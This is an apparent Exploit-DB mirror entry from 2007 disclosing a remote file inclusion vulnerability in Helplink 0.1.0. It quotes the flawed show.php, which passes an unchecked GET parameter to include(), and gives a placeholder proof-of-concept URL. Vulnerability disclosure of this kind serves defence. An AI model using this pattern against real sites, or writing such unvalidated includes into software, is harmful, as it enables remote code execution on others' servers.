exploit-db-mirror/exploits/php/webapps/4448.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

21 lines
No EOL
1.4 KiB
Text

##########################################################################
# Helplink 0.1.0 (show.php file) Remote File Inclusion Vulnerability #
# D.S : http://sourceforge.net/projects/helplink/ #
# V.C #
================================show.php=================================#
01 : <? #
02 : /** #
03 : * show.php - just throw some headers and footers around a file#
04 : */ #
05 : #
06 : include ('include.php'); #
07 : public_header(); #
08 : include($HTTP_GET_VARS["file"]); <--- xxxx// Error !! #
09 : public_footer(); #
10 : #
11 : ?> #
=========================================================================#
# POC : /show.php?file=Ev!L C0D3 #
##########################################################################
# milw0rm.com [2007-09-23]